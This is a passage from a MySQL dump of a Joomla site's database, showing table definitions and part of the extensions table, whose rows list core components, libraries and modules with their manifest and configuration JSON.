  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int NOT NULL DEFAULT '0',
  `params` text,
  PRIMARY KEY (`id`),
  KEY `catid` (`catid`,`published`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_djimageslider`
--

LOCK TABLES `fz6t4_djimageslider` WRITE;
/*!40000 ALTER TABLE `fz6t4_djimageslider` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_djimageslider` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_extensions`
--

DROP TABLE IF EXISTS `fz6t4_extensions`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_extensions` (
  `extension_id` int NOT NULL AUTO_INCREMENT,
  `package_id` int NOT NULL DEFAULT '0' COMMENT 'Parent package ID for extensions installed as a package.',
  `name` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `type` varchar(20) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `element` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `folder` varchar(100) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `client_id` tinyint NOT NULL,
  `enabled` tinyint NOT NULL DEFAULT '0',
  `access` int unsigned NOT NULL DEFAULT '1',
  `protected` tinyint NOT NULL DEFAULT '0',
  `manifest_cache` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `custom_data` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `system_data` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `checked_out` int unsigned NOT NULL DEFAULT '0',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `ordering` int DEFAULT '0',
  `state` int DEFAULT '0',
  PRIMARY KEY (`extension_id`),
  KEY `element_clientid` (`element`,`client_id`),
  KEY `element_folder_clientid` (`element`,`folder`,`client_id`),
  KEY `extension` (`type`,`element`,`folder`,`client_id`)
) ENGINE=MyISAM AUTO_INCREMENT=10162 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_extensions`
--

LOCK TABLES `fz6t4_extensions` WRITE;
/*!40000 ALTER TABLE `fz6t4_extensions` DISABLE KEYS */;
INSERT INTO `fz6t4_extensions` VALUES (1,0,'com_mailto','component','com_mailto','',0,1,1,1,'{\"name\":\"com_mailto\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MAILTO_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mailto\"}','','','',0,'0000-00-00 00:00:00',0,0),(2,0,'com_wrapper','component','com_wrapper','',0,1,1,1,'{\"name\":\"com_wrapper\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_WRAPPER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"wrapper\"}','','','',0,'0000-00-00 00:00:00',0,0),(3,0,'com_admin','component','com_admin','',1,1,1,1,'{\"name\":\"com_admin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_ADMIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(4,0,'com_banners','component','com_banners','',1,1,1,0,'{\"name\":\"com_banners\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"banners\"}','{\"purchase_type\":\"3\",\"track_impressions\":\"0\",\"track_clicks\":\"0\",\"metakey_prefix\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(5,0,'com_cache','component','com_cache','',1,1,1,1,'{\"name\":\"com_cache\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CACHE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(6,0,'com_categories','component','com_categories','',1,1,1,1,'{\"name\":\"com_categories\",\"type\":\"component\",\"creationDate\":\"December 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(7,0,'com_checkin','component','com_checkin','',1,1,1,1,'{\"name\":\"com_checkin\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CHECKIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(8,0,'com_contact','component','com_contact','',1,1,1,0,'{\"name\":\"com_contact\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTACT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"contact\"}','{\"contact_layout\":\"_:default\",\"show_contact_category\":\"hide\",\"save_history\":\"0\",\"history_limit\":10,\"show_contact_list\":\"0\",\"presentation_style\":\"plain\",\"show_tags\":\"1\",\"show_info\":\"1\",\"show_name\":\"1\",\"show_position\":\"1\",\"show_email\":\"0\",\"add_mailto_link\":\"1\",\"show_street_address\":\"1\",\"show_suburb\":\"1\",\"show_state\":\"1\",\"show_postcode\":\"1\",\"show_country\":\"1\",\"show_telephone\":\"1\",\"show_mobile\":\"1\",\"show_fax\":\"1\",\"show_webpage\":\"1\",\"show_image\":\"1\",\"image\":\"\",\"show_misc\":\"1\",\"allow_vcard\":\"0\",\"show_articles\":\"0\",\"articles_display_num\":\"10\",\"show_profile\":\"0\",\"show_links\":\"0\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"contact_icons\":\"0\",\"icon_address\":\"\",\"icon_email\":\"\",\"icon_telephone\":\"\",\"icon_mobile\":\"\",\"icon_fax\":\"\",\"icon_misc\":\"\",\"category_layout\":\"_:default\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"-1\",\"show_subcat_desc\":\"1\",\"show_empty_categories\":\"0\",\"show_cat_items\":\"1\",\"show_cat_tags\":\"1\",\"show_base_description\":\"0\",\"maxLevelcat\":\"-1\",\"show_subcat_desc_cat\":\"1\",\"show_empty_categories_cat\":\"0\",\"show_cat_items_cat\":\"1\",\"filter_field\":\"0\",\"show_pagination_limit\":\"1\",\"show_headings\":\"1\",\"show_image_heading\":\"0\",\"show_position_headings\":\"1\",\"show_email_headings\":\"0\",\"show_telephone_headings\":\"1\",\"show_mobile_headings\":\"0\",\"show_fax_headings\":\"0\",\"show_suburb_headings\":\"1\",\"show_state_headings\":\"1\",\"show_country_headings\":\"1\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"initial_sort\":\"ordering\",\"captcha\":\"recaptcha\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"0\",\"redirect\":\"\",\"show_feed_link\":\"1\",\"sef_advanced\":0,\"sef_ids\":0,\"custom_fields_enable\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(9,0,'com_cpanel','component','com_cpanel','',1,1,1,1,'{\"name\":\"com_cpanel\",\"type\":\"component\",\"creationDate\":\"Jun 2007\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2007 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CPANEL_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(10,0,'com_installer','component','com_installer','',1,1,1,1,'{\"name\":\"com_installer\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_INSTALLER_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_jed_info\":\"1\",\"cachetimeout\":\"6\",\"minimum_stability\":\"4\"}','','',0,'0000-00-00 00:00:00',0,0),(11,0,'com_languages','component','com_languages','',1,1,1,1,'{\"name\":\"com_languages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','{\"administrator\":\"tr-TR\",\"site\":\"tr-TR\"}','','',0,'0000-00-00 00:00:00',0,0),(12,0,'com_login','component','com_login','',1,1,1,1,'{\"name\":\"com_login\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(13,0,'com_media','component','com_media','',1,1,0,1,'{\"name\":\"com_media\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MEDIA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"media\"}','{\"upload_extensions\":\"bmp,csv,doc,gif,ico,jpg,jpeg,odg,odp,ods,odt,pdf,png,ppt,swf,txt,xcf,xls,BMP,CSV,DOC,GIF,ICO,JPG,JPEG,ODG,ODP,ODS,ODT,PDF,PNG,PPT,SWF,TXT,XCF,XLS\",\"upload_maxsize\":\"10\",\"file_path\":\"images\",\"image_path\":\"images\",\"restrict_uploads\":\"1\",\"allowed_media_usergroup\":\"3\",\"check_mime\":\"1\",\"image_extensions\":\"bmp,gif,jpg,png\",\"ignore_extensions\":\"\",\"upload_mime\":\"image\\/jpeg,image\\/gif,image\\/png,image\\/bmp,application\\/x-shockwave-flash,application\\/msword,application\\/excel,application\\/pdf,application\\/powerpoint,text\\/plain,application\\/x-zip\",\"upload_mime_illegal\":\"text\\/html\"}','','',0,'0000-00-00 00:00:00',0,0),(14,0,'com_menus','component','com_menus','',1,1,1,1,'{\"name\":\"com_menus\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MENUS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(15,0,'com_messages','component','com_messages','',1,1,1,1,'{\"name\":\"com_messages\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MESSAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(16,0,'com_modules','component','com_modules','',1,1,1,1,'{\"name\":\"com_modules\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_MODULES_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(17,0,'com_newsfeeds','component','com_newsfeeds','',1,1,1,0,'{\"name\":\"com_newsfeeds\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_NEWSFEEDS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"newsfeeds\"}','{\"show_feed_image\":\"1\",\"show_feed_description\":\"1\",\"show_item_description\":\"1\",\"feed_word_count\":\"0\",\"show_headings\":\"1\",\"show_name\":\"1\",\"show_articles\":\"0\",\"show_link\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"display_num\":\"\",\"show_pagination_limit\":\"1\",\"show_pagination\":\"1\",\"show_pagination_results\":\"1\",\"show_cat_items\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(18,0,'com_plugins','component','com_plugins','',1,1,1,1,'{\"name\":\"com_plugins\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_PLUGINS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(19,0,'com_search','component','com_search','',1,1,1,1,'{\"name\":\"com_search\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_SEARCH_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"search\"}','{\"enabled\":\"0\",\"show_date\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(20,0,'com_templates','component','com_templates','',1,1,1,1,'{\"name\":\"com_templates\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_TEMPLATES_XML_DESCRIPTION\",\"group\":\"\"}','{\"template_positions_display\":\"1\",\"upload_limit\":\"10\",\"image_formats\":\"gif,bmp,jpg,jpeg\",\"source_formats\":\"txt,less,ini,xml,js,php,css,sass,scss\",\"font_formats\":\"woff,ttf,otf\",\"compressed_formats\":\"zip\"}','','',0,'0000-00-00 00:00:00',0,0),(21,0,'com_weblinks','component','com_weblinks','',1,1,1,0,'{\"legacy\":false,\"name\":\"com_weblinks\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\\n\\t\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"COM_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','{\"show_comp_description\":\"1\",\"comp_description\":\"\",\"show_link_hits\":\"1\",\"show_link_description\":\"1\",\"show_other_cats\":\"0\",\"show_headings\":\"0\",\"show_numbers\":\"0\",\"show_report\":\"1\",\"count_clicks\":\"1\",\"target\":\"0\",\"link_icons\":\"\"}','','',0,'0000-00-00 00:00:00',0,0),(22,0,'com_content','component','com_content','',1,1,0,1,'{\"name\":\"com_content\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONTENT_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"content\"}','{\"article_layout\":\"_:default\",\"show_title\":\"0\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"info_block_position\":\"0\",\"info_block_show_title\":\"1\",\"show_category\":\"0\",\"link_category\":\"1\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_associations\":\"0\",\"flags\":\"1\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"1\",\"show_readmore_title\":\"1\",\"readmore_limit\":\"100\",\"show_tags\":\"1\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"record_hits\":\"1\",\"show_noauth\":\"0\",\"urls_position\":\"0\",\"captcha\":\"\",\"show_publishing_options\":\"1\",\"show_article_options\":\"1\",\"save_history\":\"0\",\"history_limit\":10,\"show_urls_images_frontend\":\"0\",\"show_urls_images_backend\":\"1\",\"targeta\":0,\"targetb\":0,\"targetc\":0,\"float_intro\":\"left\",\"float_fulltext\":\"left\",\"category_layout\":\"_:blog\",\"show_category_heading_title_text\":\"1\",\"show_category_title\":\"0\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"maxLevel\":\"1\",\"show_empty_categories\":\"0\",\"show_no_articles\":\"1\",\"show_subcat_desc\":\"1\",\"show_cat_num_articles\":\"0\",\"show_cat_tags\":\"1\",\"show_base_description\":\"1\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"0\",\"show_subcat_desc_cat\":\"1\",\"show_cat_num_articles_cat\":\"1\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"5\",\"num_columns\":\"1\",\"num_links\":\"4\",\"multi_column_order\":\"1\",\"show_subcategory_content\":\"0\",\"show_pagination_limit\":\"1\",\"filter_field\":\"hide\",\"show_headings\":\"1\",\"list_show_date\":\"0\",\"date_format\":\"\",\"list_show_hits\":\"1\",\"list_show_author\":\"1\",\"list_show_votes\":\"0\",\"list_show_ratings\":\"0\",\"orderby_pri\":\"order\",\"orderby_sec\":\"order\",\"order_date\":\"published\",\"show_pagination\":\"2\",\"show_pagination_results\":\"1\",\"show_featured\":\"show\",\"show_feed_link\":\"1\",\"feed_summary\":\"0\",\"feed_show_readmore\":\"0\",\"sef_advanced\":0,\"sef_ids\":0,\"custom_fields_enable\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(23,0,'com_config','component','com_config','',1,1,0,1,'{\"name\":\"com_config\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_CONFIG_XML_DESCRIPTION\",\"group\":\"\"}','{\"filters\":{\"1\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"6\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"7\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"2\":{\"filter_type\":\"NH\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"3\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"4\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"5\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"10\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"12\":{\"filter_type\":\"BL\",\"filter_tags\":\"\",\"filter_attributes\":\"\"},\"8\":{\"filter_type\":\"NONE\",\"filter_tags\":\"\",\"filter_attributes\":\"\"}}}','','',0,'0000-00-00 00:00:00',0,0),(24,0,'com_redirect','component','com_redirect','',1,1,0,1,'{\"name\":\"com_redirect\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_REDIRECT_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(25,0,'com_users','component','com_users','',1,1,0,1,'{\"name\":\"com_users\",\"type\":\"component\",\"creationDate\":\"April 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_USERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"users\"}','{\"allowUserRegistration\":\"0\",\"new_usertype\":\"2\",\"guest_usergroup\":\"1\",\"sendpassword\":\"1\",\"useractivation\":\"2\",\"mail_to_admin\":\"1\",\"captcha\":\"recaptcha\",\"frontend_userparams\":\"1\",\"site_language\":\"0\",\"change_login_name\":\"0\",\"domains\":[],\"reset_count\":\"10\",\"reset_time\":\"1\",\"minimum_length\":\"4\",\"minimum_integers\":\"0\",\"minimum_symbols\":\"0\",\"minimum_uppercase\":\"0\",\"minimum_lowercase\":\"0\",\"save_history\":\"0\",\"history_limit\":5,\"mailSubjectPrefix\":\"\",\"mailBodySuffix\":\"\",\"debugUsers\":\"1\",\"debugGroups\":\"1\",\"sef_advanced\":0,\"custom_fields_enable\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(27,0,'com_finder','component','com_finder','',1,1,0,0,'{\"name\":\"com_finder\",\"type\":\"component\",\"creationDate\":\"August 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2011 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"COM_FINDER_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"finder\"}','{\"show_description\":\"1\",\"description_length\":255,\"allow_empty_query\":\"0\",\"show_url\":\"1\",\"show_advanced\":\"1\",\"expand_advanced\":\"0\",\"show_date_filters\":\"0\",\"highlight_terms\":\"1\",\"opensearch_name\":\"\",\"opensearch_description\":\"\",\"batch_size\":\"50\",\"memory_table_limit\":30000,\"title_multiplier\":\"1.7\",\"text_multiplier\":\"0.7\",\"meta_multiplier\":\"1.2\",\"path_multiplier\":\"2.0\",\"misc_multiplier\":\"0.3\",\"stemmer\":\"snowball\"}','','',0,'0000-00-00 00:00:00',0,0),(28,0,'com_joomlaupdate','component','com_joomlaupdate','',1,1,0,1,'{\"name\":\"com_joomlaupdate\",\"type\":\"component\",\"creationDate\":\"February 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2012 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.10.1\",\"description\":\"COM_JOOMLAUPDATE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(100,0,'PHPMailer','library','phpmailer','',0,1,1,1,'{\"legacy\":false,\"name\":\"PHPMailer\",\"type\":\"library\",\"creationDate\":\"2001\",\"author\":\"PHPMailer\",\"copyright\":\"(c) 2001-2003, Brent R. Matzelle, (c) 2004-2009, Andy Prevost. All Rights Reserved., (c) 2010-2011, Jim Jagielski. All Rights Reserved.\",\"authorEmail\":\"jimjag@gmail.com\",\"authorUrl\":\"https:\\/\\/code.google.com\\/a\\/apache-extras.org\\/p\\/phpmailer\\/\",\"version\":\"5.2\",\"description\":\"LIB_PHPMAILER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(101,0,'SimplePie','library','simplepie','',0,1,1,1,'{\"legacy\":false,\"name\":\"SimplePie\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"SimplePie\",\"copyright\":\"Copyright (c) 2004-2009, Ryan Parman and Geoffrey Sneddon\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/simplepie.org\\/\",\"version\":\"1.2\",\"description\":\"LIB_SIMPLEPIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(102,0,'LIB_PHPUTF8','library','phputf8','',0,1,1,1,'{\"name\":\"LIB_PHPUTF8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"phputf8\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,0,'LIB_JOOMLA','library','joomla','',0,1,1,1,'{\"name\":\"LIB_JOOMLA\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2008 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"https:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"joomla\"}','{\"mediaversion\":\"59b9a97f81c129b0e3167385c8580231\"}','','',0,'0000-00-00 00:00:00',0,0),(200,0,'mod_articles_archive','module','mod_articles_archive','',0,1,1,1,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_archive\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,0,'mod_articles_latest','module','mod_articles_latest','',0,1,1,1,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_latest\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,0,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_articles_popular\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,0,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_banners\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,0,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2006 Open Source Matters, Inc.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\",\"filename\":\"mod_breadcrumbs\"}','','','',0,'0000-00-00 